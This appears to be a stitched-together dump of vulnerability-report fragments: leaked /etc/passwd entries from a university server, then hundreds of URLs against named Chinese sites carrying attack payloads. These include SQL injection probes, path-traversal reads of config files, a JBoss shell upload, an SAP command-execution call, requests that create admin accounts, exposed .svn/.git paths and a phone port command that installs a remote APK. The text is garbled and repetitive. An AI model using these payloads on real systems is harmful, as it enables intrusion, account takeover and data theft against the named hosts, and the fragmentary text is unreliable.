japanlawinfo:x:522:523::/home/japanlawinfo/./wwwroot:/sbin/nologin yjsh:x:523:524::/home/yjsh/./wwwroot:/sbin/nologin mbmr:x:524:525::/home/mbmr/./wwwroot:/sbin/nologin icm:x:525:526::/home/icm/./wwwroot:/sbin/nologin lhp:x:526:527::/home/lhp/./wwwroot:/sbin/nologin gfy:x:528:529:国防院:/home/gfy/./wwwroot:/sbin/nologin caolh:x:529:530::/home/caolh:/bin/bash qlng:x:531:533:齐鲁医院农工党:/home/qlng/./wwwroot:/bin/nologin xyy:x:532:534:校医院:/home/xyy/./wwwroot:/bin/nologin summer:x:533:535:教务处暑期学校:/home/summer/./wwwroot:/bin/nologin art:x:534:536:艺术学院:/home/art/./wwwroot:/bin/nologin fbjf:x:535:537:数学学院复变积分:/home/fbjf/./wwwroot:/bin/nologin cah:x:536:538:土建与水利实验教学示范中心:/home/cah/./wwwroot:/bin/nologin jjh:x:537:539:教育基金会:/home/jjh/./wwwroot:/bin/nologin jgdw:x:538:540:机关党委:/home/jgdw/./wwwroot:/bin/nologin njournal:x:539:541:学报:/home/njournal/./wwwroot:/bin/nologin njournal1:x:540:542:xuebao:/home/njournal1/./wwwroot:/bin/nologin njournal2:x:541:543:xuebao:/home/njournal2/./wwwroot:/bin/nologin njournal3:x:542:544:xuebao:/home/njournal3/./wwwroot:/bin/nologin njournal4:x:543:545:xuebao:/home/njournal4/./wwwroot:/bin/nologin vhost2:x:544:546::/home/vhost2/./wwwroot:/bin/nologin wszyjy:x:545:547:文史哲研究院:/home/wszyjy/./wwwroot:/bin/nologin ppcb:x:546:548:品牌与传播研究所:/home/ppcb/./wwwroot:/bin/nologin xwgk:x:547:549:校办的校务公开网:/home/xwgk/./wwwroot:/bin/nologin hqc:x:548:550::/home/hqc/./wwwroot:/bin/nologin crystal:x:549:551::/home/crystal/./wwwroot:/bin/nologin camm:x:550:552::/home/camm/./wwwroot:/bin/nologin huanke:x:551:553:huanjingkexueyuan:/home/huanke/./wwwroot:/bin/nologin wxl:x:552:554::/home/wxl:/bin/bash skc:x:553:555::/home/skc2/./wwwroot:/bin/nologin cbs:x:554:556::/home/cbs/./wwwroot:/bin/nologin zzgc:x:555:557::/home/zzgc/./wwwroot:/bin/nologin plaoffice:x:556:558::/home/plaoffice/./wwwroot:/bin/nologin xzxx:x:557:559:党委学校办公室:/home/xzxx/./wwwroot:/bin/nologin sdutc:x:558:560:土建与水利学院交通规划研究中心:/home/sdutc/./wwwroot:/bin/nologin bgs:x:559:561:校办:/home/bgs/./wwwroot:/bin/nologin 
sdeac:x:561:563:经济学年会:/home/sdeac/./wwwroot:/bin/nologin rie:x:562:564:产业经济评论:/home/rie/./wwwroot:/bin/nologin zscq:x:563:565:科技处知识产权网:/home/zscq/./wwwroot:/bin/nologin mla:x:564:566:图像处理与模式识别研究组:/home/mla/./wwwroot:/bin/nologin rcsm:x:565:567:可持续制造研究中心:/home/rcsm/./wwwroot:/bin/nologin nwhxq:x:566:568:南外环新区:/home/nwhxq/./wwwroot:/bin/nologin plant:x:567:569::/home/plant/./wwwroot:/bin/nologin emba:x:568:570::/home/emba/./wwwroot:/bin/nologin art2:x:569:571::/home/art2/./wwwroot:/bin/nologin bxmyeast:x:570:572:酵母遗传学及分子生物学课题组:/home/bxmyeast/./wwwroot:/bin/nologin jj:x:571:573:基建处:/home/jj/./wwwroot:/bin/nologin yjfz:x:572:574:幼儿教育发展中心:/home/yjfz/./wwwroot:/bin/nologin xxgk:x:573:575:信息公开:/home/xxgk/./wwwroot:/bin/nologin me:x:575:577:管理学院工程硕士教育中心:/home/me/./wwwroot:/bin/nologin korea:x:576:578:朝鲜语系:/home/korea/./wwwroot:/bin/nologin ieet:x:578:580:产业经济研究所:/home/ieet/./wwwroot:/bin/nologin function:x:579:581:医学院机能教学实验室:/home/function/./wwwroot:/bin/nologin media:x:580:582:宣传部宣传科:/home/media/./wwwroot:/bin/nologin nprmeeting:x:581:583:药学院npr会议:/home/nprmeeting/./wwwroot:/bin/nologin gsp:x:582:584:加拿大高等教育:/home/gsp/./wwwroot:/bin/nologin lcyxtszy:x:583:585:医学院本科教育:/home/lcyxtszy/./wwwroot:/bin/nologin eera:x:584:586:能效研究:/home/eera/./wwwroot:/bin/nologin mbbs:x:585:587:医学院临床留学生:/home/mbbs/./wwwroot:/bin/nologin dcd:x:586:588:合作发展部:/home/dcd/./wwwroot:/bin/nologin arrc:x:587:589:经济学院:/home/arrc/./wwwroot:/bin/nologin mti:x:588:590:外国语学院翻译硕士管理中心:/home/mti/./wwwroot:/bin/nologin gnhz:x:589:591:合作发展部国内合作办公室:/home/gnhz/./wwwroot:/bin/nologin ncmg2010:x:590:592:医学院遗传所:/home/ncmg2010/./wwwroot:/bin/nologin http://www.ncmg2010.sdu.edu.cn还存在任意文件下载漏洞, http://www.ncmg2010.sdu.edu.cn/downloadfile.php?path=../admin/config.php http://www.jjl.cn/jjl.tar.gz http://**.**.**.**/ http://**.**.**.**/Pages/Admin/SysAdmin.aspx?Id=1 http://**.**.**.**/Pages/User/UserHome.aspx http://**.**.**.**/App_Upload/Document/ http://pk.tom.com/web/forgot/sendGetPwdMail.jsp?email=1 
https://github.com/cheng-ran/tonxon/blob/3b1715ddd0488b0fef76cdc6731eac0649ea1158/ROOT/WEB-INF/classes/Configuration.xml http://m.class.cn http://**.**.**.**/ http://**.**.**.**/People/Professor/individual.php?TeacherID=T9434 http://**.**.**.**/People/Professor/individual.php?TeacherID=T9434 http://www.qmango.com/ThirdPartLogin/qqcaibei/speclist.asp?id=108%20and%201=1 http://**.**.**.** http://**.**.**.**/new_2.asp?id=50 http://**.**.**.**/dizhi_1.asp?id=1 https://reg.fuiou.com/findUserPassword.action http://t.hrsec.com.cn/upload/software/%E5%8D%8E%E8%9E%8D%E7%94%9F%E4%BA%A7%E6%B5%8B%E8%AF%95%E8%AF%B4%E6%98%8E.txt http://admin.iask.sina.com.cn/api/.svn/entries http://admin.iask.sina.com.cn/data/.svn/entries http://admin.iask.sina.com.cn/images/.svn/entries http://admin.iask.sina.com.cn/admin/.svn/entries http://admin.iask.sina.com.cn/css/admin/.svn/entries https://svn1.intra.sina.com.cn/vdisk/audit/adminManage23/htdocs/admin https://svn1.intra.sina.com.cn/vdisk svn:special svn:externals svn:needs-lock http://hwnet.cnhubei.com/ http://**.**.**.**:8080/govinfo/index.htm http://**.**.**.**/xinwen/xinwen.asp?id=1444这个链接的id处存在sql注入漏洞。 http://**.**.**.**/xinwen/xinwen.asp?id=1444 http://**.**.**.**/xinwen/xinwen.asp?id=1444/**/AND www.luckyxp.net http://www.andaijia.cn/apply/introduction/id/46 http://www.andaijia.cn/apply/index/id/24 http://**.**.**.**/main_news.php?seq=31 http://www.brim28.com/tc/shop_f.php?i=111 http://www.brim28.com/tc/shop_f.php?i=111 http://**.**.**.**:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://crmxid.hisense.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe http://cemftp.ce-air.com/yyoa/checkWaitdo.jsp?userID=1 view-source:http://cemftp.ce-air.com/yyoa/common/SelectPerson/reloadData.jsp http://cemftp.ce-air.com/yyoa/assess/js/initDataAssess.jsp http://192.168.1.8:9182/request?action=startapp&app=com.android.chrome 
http://192.168.1.8:9182/request?action=showtoast&content=文本内容 http://192.168.1.8:9182/request?action=install&url=http://file-bak.liqucn.com/upload/2015/qipai/qyw_1.4.7_2200126314.apk&name=123 http://192.168.1.8:9182/request?action=appslist http://192.168.1.8:9182/request?action=getbdid http://**.**.**.**/Web_Org/St_Info.aspx?typeid=3 http://**.**.**.**/Web_Org/St_Info.aspx?typeid=3 http://**.**.**.**/Web_Org/St_Info.aspx?typeid=3 http://**.**.**.**/Web_Org/St_Info.aspx?typeid=3 http://**.**.**.**/Web_Org/St_Info.aspx?typeid=9 http://**.**.**.**/query/index.asp http://**.**.**.** http://**.**.**.**/viewpages_main/ShowViewPagesThird.do?fcid=1ef635ad-95cd-4e73-b389-0929dc9b740d&classId=7c9a2258-f8d5-44c0-a008-8b078f718127 http://**.**.**.**/b1-1.php?nid=1138 http://i.chaoxing.com/24183374 http://**.**.**.**/bugs/wooyun-2015-0137380在该版本中也存在,可用来给低权限帐号提升权限。 http://**.**.**.**/jiaowu/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu_2008/jwgl/jxjh/jxjha.asp http://**.**.**.**/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu_2008/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu//jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu//jwgl/jxjh/jxjha.asp http://**.**.**.**:8181/jwgl/jxjh/jxjha.asp http://**.**.**.**/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu/jwgl/jxjh/jxjha.asp http://**.**.**.**/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu_2008/jwgl/jxjh/jxjha.asp http://cp.luckyxp.net/ http://healthadmin.jxdyf.com/ http://**.**.**.**/ http://**.**.**.**/ http://170.youku.com/MVNO-OBH/orderquery/getOrderInfo http://**.**.**.**/tc/latestnews_events/latest_news_detail.html?id=2365 http://**.**.**.**/bugs/wooyun-2010-063832 http://**.**.**.**:7001/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp http://**.**.**.**:7001/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp 
http://**.**.**.**/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp http://**.**.**.**:88/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp http://**.**.**.**/ http://smartvideo.youku.com/ http://www.yingke.tv/Shop/ShopDetail.aspx?id=1103 http://www.yingke.tv/NewsList.aspx?cityid=11&type=1 http://123.125.17.201:7070/cc/portal.jsp http://123.125.17.201:7070/cc/login.do?method=modifyPassword http://182.92.225.109:9999/management/status.jsp http://42.62.53.93/mag-delivery/ http://42.62.53.93/invoker/JMXInvokerServlet上传shell http://42.62.53.93/jbossws13/index.jsp http://**.**.**.**/ https://mp.weixin.qq.com/cgi-bin/home?t=home/index&lang=zh_CN&token=1037067635 http://218.58.70.201/haier/ http://218.58.70.201/invoker/JMXInvokerServlet admin:service=DeploymentFileRepository http://218.58.70.201/myname/test1.jsp http://116.6.67.208/hr/list.html?i_type=30 http://116.6.67.208/hr/list.html?i_type=30’” http://116.6.67.208/hr/list.html?i_type=30%27 http://116.6.67.208/hr/list.html?i_type=30%27 http://oa.copm.com.cn/ http://mail.copm.com.cn/ http://**.**.**.**/bugs/wooyun-2010-061802 http://**.**.**.**/article.asp?articleid=3195 http://**.**.**.**/article.asp?articleid=770 http://**.**.**.**/article.asp?articleid=6045 http://**.**.**.**/article.asp?articleid=1383 http://**.**.**.**/article.asp?articleid=1818 www.zip http://**.**.**.**/index.php?m=admin&c=index&pc_hash=qUWWio http://**.**.**.**/ http://**.**.**.**/ http://www.cn357.com/login_1 http://sqlmap.org http://www.yumazu.com.cn/uc_server/admin.php http://m.class.cn http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin&adminpassword=111111&guid=1_ 
http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://m.haodai.com/guilin/ http://www.tddx.cn/ URLhttp://61.233.14.172/D:%5C/ http://oa.erdosgroup.cn/ http://www.econ.sdu.edu.cn/bkjx/list_art.php?id=75995&sortid=199 http://travel.go.qq.com/v2/home.html ip:12580/?action=PlayPushUrl之类的调用 www.class.cn http://www.class.cn http://**.**.**.**/ 
http://**.**.**.**:8001/console/login/LoginForm.jsp http://ptrack.sundns.com/viewfaq.php?faqid=120 http://bbs.59store.com/.git/服务器返回403说明文件存在,接下来用上git神器,获得所有的源码 jdbc:oracle:thin:@**.**.**.**:1521:wddb01 http://oa.yogi.com.cn/yyoa/ http://oa.yogi.com.cn/yyoa/checkWaitdo.jsp?userID=1 http://oa.yogi.com.cn/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://oa.yogi.com.cn/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1 http://oa.yogi.com.cn/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=* http://oa.yogi.com.cn/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1 http://oa.yogi.com.cn/yyoa/ext/trafaxserver/ReceiveFax/messageViewer.jsp?fax_id=1 http://oa.yogi.com.cn/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://116.236.239.102/servlet/com.zotn.screens.HomeProxyServlet http://116.236.239.102/%20../web-inf/ http://112.64.153.38/servlet/com.zotn.screens.HomeProxyServlet http://piao.21edu.com/ http://staff.xueda.com/staff/home http://dashboard2.xueda.com/ Host:fantasica.mobage.cn http://fantasica.mobage.cn/home http://ehr.ele.me:9004/portal http://act.rajax.me/ http://**.**.**.**/Web_Org/Ddcb_View.aspx?infoid=58 http://**.**.**.**/Web_Org/Ddcb_View.aspx?infoid=97 http://**.**.**.**/web_Org/About_Us.aspx?infoid=a http://**.**.**.**/Web_Org/About_Us.aspx?infoid=a http://**.**.**.**/Web_Org/Qa_Quert_List.aspx?info=4123 http://**.**.**.**/Web_Org/Qa_Quert_List.aspx?info=4139 http://**.**.**.**/Web_Org/Qa_Quert_List.aspx?info=4126 http://**.**.**.**/Web_Org/Course_Face_Info.aspx?infoid=2 http://**.**.**.**/Web_Org/Course_Face_Info.aspx?infoid=4 http://**.**.**.**/pro/product.html http://oa.baixiangfood.com/ http://**.**.**.**/bugs/wooyun-2010-0116998 http://**.**.**.**/oa/Flower/Action.aspx?action=GETINFO&id=1'/**/and/**/@@version=1-- http://**.**.**.**/bugs/wooyun-2010-0116998 http://**.**.**.**/oa/OA_QuickLogin.aspx?info=1'/**/and/**/@@version=1/**/and/**/'a'='a,520 http://**.**.**.**,利用EXP如下 
http://**.**.**.**/oa/Js/jquery.uploadify.aspx http://www.zzidc.com/main/member/initForgetPasswd.html index.php/api/testdriveapi?0.5837047907939267 http://**.**.**.** http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0 http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0 www.UserAccount http://**.**.**.**/ http://**.**.**.**/ http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%27 http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20@@version http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20user http://www.syltmall.com/NodeProdCategory.aspx?action=GetChildNode&CategoryId=1 http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ 
http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1& http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ 
http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ 
http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ 
http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ 
http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ 
